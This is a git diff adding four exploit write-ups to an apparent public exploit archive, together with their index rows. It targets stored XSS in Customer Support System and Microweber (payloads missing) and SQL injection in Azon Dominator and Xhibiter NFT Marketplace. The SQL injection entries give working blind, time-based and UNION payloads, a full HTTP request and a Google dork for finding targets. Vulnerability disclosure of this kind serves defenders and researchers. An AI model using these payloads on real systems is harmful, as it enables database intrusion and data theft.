diff --git a/exploits/php/webapps/52057.txt b/exploits/php/webapps/52057.txt
new file mode 100644
index 000000000..2d648e9f1
--- /dev/null
+++ b/exploits/php/webapps/52057.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Customer Support System 1.0 - (XSS) Cross-Site
+Scripting Vulnerability in the "subject" at "ticket_list"
+# Date: 28/11/2023
+# Exploit Author: Geraldo Alcantara
+# Vendor Homepage:
+https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html
+# Software Link:
+https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code
+# Version: 1.0
+# Tested on: Windows
+# CVE : CVE-2023-49976
+*Steps to reproduce:*
+1- Log in to the application.
+2- Visit the ticket creation/editing page.
+3- Create/Edit a ticket and insert the malicious payload into the
+"subject" field/parameter.
+Payload:
\ No newline at end of file
diff --git a/exploits/php/webapps/52058.txt b/exploits/php/webapps/52058.txt
new file mode 100644
index 000000000..bd15c7674
--- /dev/null
+++ b/exploits/php/webapps/52058.txt
@@ -0,0 +1,19 @@
+# Exploit Title: Stored XSS in Microweber
+# Date: 06/18/2024
+# Exploit Author: tmrswrr
+# Vendor Homepage: (https://microweber.me/)
+# Version: 2.0.15
+# Tested on: (http://active.demo.microweber.me/)
+
+## Vulnerability Description
+A Stored Cross-Site Scripting (XSS) vulnerability has been identified in Microweber version 2.0.15. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
+
+## Steps to Reproduce
+1. Log in to the application.
+2. Navigate to `Users > Edit Profile`.
+3. In the `First Name` field, input the following payload:
+
+ ">
+
+4. Save the changes.
+5. Upon visiting any page where the modified user profile is displayed, an alert box will appear, indicating the execution of the injected script.
\ No newline at end of file
diff --git a/exploits/php/webapps/52059.txt b/exploits/php/webapps/52059.txt
new file mode 100644
index 000000000..e1c7742f8
--- /dev/null
+++ b/exploits/php/webapps/52059.txt
@@ -0,0 +1,38 @@
+ # Exploit Title: Azon Dominator - Affiliate Marketing Script - SQL Injection
+# Date: 2024-06-03
+# Exploit Author: Buğra Enis Dönmez
+# Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
+# Demo Site: https://azon-dominator.webister.net/
+# Tested on: Arch Linux
+# CVE: N/A
+
+### Request ###
+
+POST /fetch_products.php HTTP/1.1
+Content-Type: application/x-www-form-urlencoded
+Accept: */*
+x-requested-with: XMLHttpRequest
+Referer: https://localhost/
+Cookie: PHPSESSID=crlcn84lfvpe8c3732rgj3gegg; sc_is_visitor_unique=rx12928762.1717438191.4D4FA5E53F654F9150285A1CA42E7E22.8.8.8.8.8.8.8.8.8
+Content-Length: 79
+Accept-Encoding: gzip,deflate,br
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
+Host: localhost
+Connection: Keep-alive
+
+cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112
+
+###
+
+### Parameter & Payloads ###
+
+Parameter: cid (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: cid=1) AND 7735=7735 AND (5267=5267
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442
+
+###
\ No newline at end of file
diff --git a/exploits/php/webapps/52060.txt b/exploits/php/webapps/52060.txt
new file mode 100644
index 000000000..db2dd067e
--- /dev/null
+++ b/exploits/php/webapps/52060.txt
@@ -0,0 +1,27 @@
+# Exploit Title: xhibiter nft marketplace SQLI
+# Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"
+# Date: 29/06/204
+# Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/
+# Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA
+# Version: 1.10.2
+# Tested on: linux
+# CVE : [if applicable]
+
+on this dir
+https://localhost/collections?id=2
+xhibiter nft marketplace suffers from SQLI
+
+---
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa
+
+ Type: UNION query
+ Title: MySQL UNION query (NULL) - 36 columns
+ Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
+---
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 64d6415b7..966949383 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -14543,6 +14543,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25373,exploits/php/webapps/25373.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' Cross-Site Scripting",2005-04-09,kre0n,webapps,php,,2005-04-09,2013-05-12,1,CVE-2005-1081;OSVDB-15526,,,,,https://www.securityfocus.com/bid/13082/info
25374,exploits/php/webapps/25374.txt,"Azerbaijan Development Group AzDGDatingPlatinum 1.1.0 - 'view.php?id' SQL Injection",2005-04-09,kre0n,webapps,php,,2005-04-09,2013-05-12,1,CVE-2005-1082;OSVDB-15524,,,,,https://www.securityfocus.com/bid/13082/info
12695,exploits/php/webapps/12695.txt,"Azimut Technologie - Admin Authentication Bypass",2010-05-22,Ra3cH,webapps,php,,2010-05-21,,0,,,,,,
+52059,exploits/php/webapps/52059.txt,"Azon Dominator Affiliate Marketing Script - SQL Injection",2024-07-01,"Buğra Enis Dönmez",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
860,exploits/php/webapps/860.c,"Aztek Forum 4.0 - 'myadmin.php' Database Dumper",2005-03-07,sirius_black,webapps,php,,2005-03-06,,1,OSVDB-14632;CVE-2005-0700,,,,,
1616,exploits/php/webapps/1616.pl,"Aztek Forum 4.0 - 'myadmin.php' User Privilege Escalation",2006-03-26,Sparah,webapps,php,,2006-03-25,2017-04-07,1,,,,,,
24731,exploits/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",webapps,php,,2004-11-12,2013-03-12,1,CVE-2004-2725;OSVDB-11704,,,,,https://www.securityfocus.com/bid/11654/info
@@ -16659,6 +16660,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
49276,exploits/php/webapps/49276.txt,"Customer Support System 1.0 - 'id' SQL Injection",2020-12-17,"Saeed Bala Ahmed",webapps,php,,2020-12-17,2020-12-17,0,,,,,,
49030,exploits/php/webapps/49030.txt,"Customer Support System 1.0 - 'username' Authentication Bypass",2020-11-11,"Ahmed Abbas",webapps,php,,2020-11-11,2020-11-11,0,,,,,,
49029,exploits/php/webapps/49029.txt,"Customer Support System 1.0 - Cross-Site Request Forgery",2020-11-11,"Ahmed Abbas",webapps,php,,2020-11-11,2020-11-11,0,,,,,,
+52057,exploits/php/webapps/52057.txt,"Customer Support System 1.0 - Stored XSS",2024-07-01,"Geraldo Alcantara",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
50994,exploits/php/webapps/50994.txt,"CuteEditor for PHP 6.6 - Directory Traversal",2022-08-01,"Stefan Hesselman",webapps,php,,2022-08-01,2022-08-01,0,,,,,,
9485,exploits/php/webapps/9485.txt,"Cuteflow 2.10.3 - 'edituser.php' Security Bypass",2009-08-24,"Hever Costa Rocha",webapps,php,,2009-08-23,,1,CVE-2009-2960;OSVDB-57391,,,,,
20111,exploits/php/webapps/20111.rb,"CuteFlow 2.11.2 - Arbitrary File Upload (Metasploit)",2012-07-27,Metasploit,webapps,php,,2012-07-27,2012-07-27,1,OSVDB-84289,"Metasploit Framework (MSF)",,,,
@@ -23507,6 +23509,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
37735,exploits/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / PHP Remote Code Execution",2015-08-07,LiquidWorm,webapps,php,80,2015-08-07,2015-08-07,0,OSVDB-125875,,,,http://www.exploit-db.commicroweber-1.0.3.tar.gz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5250.php
37734,exploits/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,webapps,php,80,2015-08-07,2016-08-30,0,OSVDB-125873,,,,http://www.exploit-db.commicroweber-1.0.3.tar.gz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5249.php
50768,exploits/php/webapps/50768.txt,"Microweber 1.2.11 - Remote Code Execution (RCE) (Authenticated)",2022-02-21,"Chetanya Sharma",webapps,php,,2022-02-21,2022-02-21,0,CVE-2022-0557,,,,,
+52058,exploits/php/webapps/52058.txt,"Microweber 2.0.15 - Stored XSS",2024-07-01,tmrswrr,webapps,php,,2024-07-01,2024-07-01,0,,,,,,
32831,exploits/php/webapps/32831.txt,"Microweber CMS 0.93 - Cross-Site Request Forgery",2014-04-13,sajith,webapps,php,,2014-04-13,2014-04-13,1,OSVDB-105791,,,http://www.exploit-db.com/screenshots/idlt33000/screen-shot-2014-04-13-at-104833.png,http://www.exploit-db.commicroweber-0.9343.zip,
35720,exploits/php/webapps/35720.txt,"Microweber CMS 0.95 - SQL Injection",2015-01-07,"Pham Kien Cuong",webapps,php,80,2015-01-07,2015-01-07,0,CVE-2014-9464;OSVDB-116689,,,,http://www.exploit-db.commicroweber-0.934.tar.gz,
49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php,,2021-05-10,2021-05-10,0,CVE-2020-28337,,,,,
@@ -34356,6 +34359,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
25090,exploits/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass",2005-02-08,"Albania Security Clan",webapps,php,,2005-02-08,2013-04-30,1,,,,,,https://www.securityfocus.com/bid/12489/info
21381,exploits/php/webapps/21381.txt,"XGB Guestbook 1.2 - User-Embedded Scripting",2002-04-15,Firehack,webapps,php,,2002-04-15,2012-09-19,1,OSVDB-86910,,,,,https://www.securityfocus.com/bid/4513/info
8101,exploits/php/webapps/8101.txt,"XGuestBook 2.0 - Authentication Bypass",2009-02-24,Fireshot,webapps,php,,2009-02-23,,1,OSVDB-52357;CVE-2009-0810,,,,,
+52060,exploits/php/webapps/52060.txt,"Xhibiter NFT Marketplace 1.10.2 - SQL Injection",2024-07-01,"Sohel Yousef",webapps,php,,2024-07-01,2024-07-01,0,,,,,,
1605,exploits/php/webapps/1605.php,"XHP CMS 0.5 - 'upload' Remote Command Execution",2006-03-22,rgod,webapps,php,,2006-03-21,2016-06-30,1,OSVDB-24059;CVE-2006-1371;OSVDB-24058,,,,http://www.exploit-db.comxhp_0_5.tar.gz,
28509,exploits/php/webapps/28509.txt,"XHP CMS 0.5.1 - 'index.php' Cross-Site Scripting",2006-09-11,"HACKERS PAL",webapps,php,,2006-09-11,2013-09-25,1,CVE-2006-4751;OSVDB-28751,,,,,https://www.securityfocus.com/bid/19948/info
40576,exploits/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",webapps,php,,2016-10-19,2016-10-19,0,,,,,http://www.exploit-db.comxhp_0_5_1.zip,